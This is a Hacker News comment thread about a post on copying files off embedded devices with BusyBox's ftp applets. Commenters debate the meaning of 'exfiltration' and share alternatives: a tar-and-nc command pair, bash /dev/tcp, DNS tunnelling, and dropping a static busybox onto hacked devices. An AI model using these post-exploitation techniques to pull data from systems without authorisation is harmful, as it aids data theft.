Hacker News new | past | comments | ask | show | jobs | submit login
Exfiltrating files with BusyBox (bitquark.co.uk)
49 points by internetwache on Oct 3, 2016 | hide | past | favorite | 22 comments

That was a let down. Is it really "exfiltration" when you use a protocol designed for mass data transfer and you use it in the exact manner it was intended to be used? The less linkbaity title is "Transferring files with BusyBox's ftp"

The point of the post was to show how easy it is, as people seem to miss these commands or may not be aware of how easy it is to set up a listening service. It's exfiltration by definition, but you are of course free to mangle the data any way you want or use DNS techniques if you really care about hiding what you're doing, but that's a different post.

What is your definition of exfiltration? Or more importantly how do you distinguish between exfil and normal transfer by an authorized user?

There are a lot of embedded devices with fairly trivial vulnerabilities that let you run arbitrary shell commands, but a limited enough set of available commands that getting data out, or doing anything else useful, is nontrivial. (Note that you may not even be able to see the stdout/stderr of the command.) This is showing one way to do that.

Yeah, this is showing one way to copy data from a computer using busybox's ftp client. Where is the surreptitious smuggling? I like my exfil to atleast have a hint of James Bond, MacGuyver, or Rube Goldberg; otherwise it's just copying files off a computer using the default file transfer tools.

I very much prefer using "tar" and "nc".


Host1: "tar -cf - /file1 /file2 | nc -l -p 54321"

Host2: "nc host1 54321 | tar -xf -"

If you have bash, you can even partially get by without netcat as well. Bash has the wonderful "fake" devicenodes, /dev/tcp/host/port and /dev/udp/host/port.

If your system is running busybox you usually won't have full fat bash.

One thing that annoys me is how people will crack a quad core 1.6Ghz smartphone with 64Gb of storage and then install busybox to save those 50Mb over a regular shell environment that won't embarrass itself on every shell script or configure script.

It's easier to cross-compile busybox (or toybox) than Bash. Cross compiling for Linux is annoying, cross compiling for Android is even more annoying.

Agreed, I've clarified why I went with ftp and added a note with example usage of nc, thanks!

Indeed, the tools listing in that post makes clear that nc should be available. If you have another Unix machine elsewhere, the nc solution avoids having to install any new software on either machine.

Indeed! I meant to mention the nc option, but I've found that ftpput/get are more often available than nc, perhaps something to do with the ubiquity of ftp.

Much the other way around. Netcat is ubiquitous. I haven't come across many systems with ftpput and ftpget.

Neat challenge left as an exercise to the reader: whois can be used to transfer files too. :)

Interesting, we must be looking at a different class of devices. If we're going down that road, there's always base64 and copy + paste!

>whois can be used to transfer files too.

Ah, the old DNS-tunnelling trick. A fun way to flip cheap hotels the bird.

The ftpput and ftpget commands might not be available even as arguments to the busybox command, depending on how it was configured at build time.

    # type ftpput
    -sh: type: ftpput: not found
    # busybox ftpput
    busybox: applet not found
Likewise for "nc".

I've used similar things to get a dump of router/modem firmware.

Busybox can be built with as many or as few applets as you want. If the busybox you have access to doesn't have what you need, you could always try putting another busybox in /tmp - https://busybox.net/downloads/binaries/ should have a static binary that works on whatever device you have.

You're absolutely right - one of the nice things about Busybox is that it's reasonably easy to configure which utilities you'd like included in the build.

Your example along with OP's showcase why it's a good idea to audit the utilities you include at build time!

Don't forget that these stupid little devices nearly ALWAYS have a webserver running //somewhere// on them.

If you really need to get some data off, look at how much memory you have and just window the copied data in to files you can DL.

Many of the less expensive and crappier ones ship with very little memory, very little flash, and a VERY restrictive busybox build.

Still, somewhere between that and the kernel are going to be the tools you need to get chunks of data out.

We ($work) have some embedded devices running BusyBox and I typically just use TFTP. It's simple, it works, and we already have an internal TFTP server.

I had to get some files off/on a hacked device over a serial port (networking was broken). Luckily the BusyBox included uuencode/decode so I didn't have to get too extreme.

"Exfiltrating" implies a covert action... Using ftp is kinda obvious!

busybox also has wget and a httpd

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact